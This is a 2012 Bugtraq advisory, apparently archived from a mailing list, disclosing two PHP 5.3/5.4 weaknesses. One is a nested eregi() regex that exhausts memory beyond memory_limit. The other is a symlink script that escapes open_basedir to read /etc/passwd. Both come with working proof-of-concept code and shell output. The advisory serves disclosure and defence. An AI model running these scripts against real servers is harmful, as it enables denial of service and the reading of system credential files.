'PHP 5.4/5.3 deprecated eregi() memory_limit bypass'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    PHP 5.4/5.3 deprecated eregi() memory_limit bypass
From:       cxib () cxsecurity ! com
Date:       2012-03-30 13:05:55
Message-ID: 201203301305.q2UD5tFn027886 () sf01web2 ! securityfocus ! com
[Download RAW message or body]

[ PHP 5.4/5.3 deprecated eregi() memory_limit bypass ]

Author: Maksymilian Arciemowicz
Website: http://cxsecurity.com/ 
Date: 30.03.2012

Original link:
http://cxsecurity.com/issue/WLB-2012030272

PoC's:
memory_limit poc
http://cxsecurity.com/issue/WLB-2012030271
open_basedir poc
http://cxsecurity.com/issue/WLB-2012030270


--- 1. PHP memory_limit bypass ---
Functions based on POSIX Regular Expression eg. eregi, are deprecated since PHP 5.3. \
In last version 5.4.0 we may still use these functions. It allow us to bypass \
memory_limit in PHP.

eregi() function based on POSIX regexp, otherwise preg_match() based on PCRE. This is \
the main difference between these functions.

POSIX Regex Functions Tutrial
http://lu.php.net/manual/en/ref.regex.php

PCRE Functions Tutrial
http://lu.php.net/manual/en/ref.pcre.php

In last year, we have published a fix for regcomp()/libc function from NetBSD source. \
eregi() use the same source code what in libc of netbsd. In result, we may exhaustion \
memory limit or stack in PHP

See our security note:
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102

Script presented below, show how to use eregi() to exhaustion memory in PHP

- http://cxsecurity.com/issue/WLB-2012030271 --
<?
/*
PHP 5.4 5.3 memory_limit bypass exploit poc
by Maksymilian Arciemowicz http://cxsecurity.com/
cxib [ a.T] cxsecurity [ d0t] com

To show memory_limit in PHP

# php /www/memlimpoc.php 1 35000000
PHP Fatal error:  Allowed memory size of 33554432 bytes exhausted (tried to allocate \
35000001 bytes) in /var/www/memlimpoc.php on line 12

Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate \
35000001 bytes) in /var/www/memlimpoc.php on line 12

and try this 

# php /www/memlimpoc.php 2

memory_limit bypassed
*/

ini_set("memory_limit","32M");

if($argv[1]==1)
	$sss=str_repeat("A",$argv[2]);
elseif($argv[1]==2)
	eregi("(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((( \
(((((((((((((((((((((((((((((((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2 \
}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}) \
{1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1 \
,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2 \
}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}) \
{1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1 \
,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2 \
}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}) \
{1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a");


?>
- http://cxsecurity.com/issue/WLB-2012030271 --

Remember. Don't use memory_limit as a main memory limiter.


--- 2. PHP open_basedir bypass ---
PHP latest version, 5.4.0 brought many changes. safe_mode has been removed but \
open_basedir is still available for use. We don't need look for new ways to bypass \
open_basedir. The problem with symlinks is still available in PHP. 

safe_mode tutrial
http://php.net/manual/en/features.safe-mode.php

PoC:
127# cat sym.php
<?php
symlink("/etc/passwd", "./symlink");
?>
127# php sym.php
PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not \
within the allowed path(s): (/www) in /www/test/sym.php on line 2

Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not \
                within the allowed path(s): (/www) in
/www/test/sym.php on line 2
127# 

open_basedir will disallow /etc/passwd. 

Let`s see:
127# ls -la
total 8
drwxr-xr-x 2 www www 512 Oct 20 00:33 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php
<?php
mkdir("abc");
chdir("abc");
mkdir("etc");
chdir("etc");
mkdir("passwd");
chdir("..");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../etc/passwd", "exploit");
unlink("tmplink");
mkdir("tmplink");
?>

127# php kakao.php
127# ls -la
total 12
drwxr-xr-x 4 www www 512 Oct 20 00:37 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
..

now "tmplink" is a directory. so link "exploit" will be "../../etc/passwd". We don't \
need bypass open_basedir, it is a design mistake. PHP will allow \
"tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd really exists.

PoC:
http://cxsecurity.com/issue/WLB-2012030270

Remember. Don't use open_basedir as a main security feature.


--- 3. References ---
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102

memory_limit bypass poc
http://cxsecurity.com/issue/WLB-2012030271

PHP 5.2.11/5.3.0 Multiple Vulnerabilities
http://cxsecurity.com/research/70

open_basedir bypass poc
http://cxsecurity.com/issue/WLB-2012030270


--- 4. Contact ---
Author: Maksymilian Arciemowicz
Email: max {AA\TT cxsecurity |D|0|T] com
http://cxsecurity.com/
http://cxsecurity.com/cvemap/


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic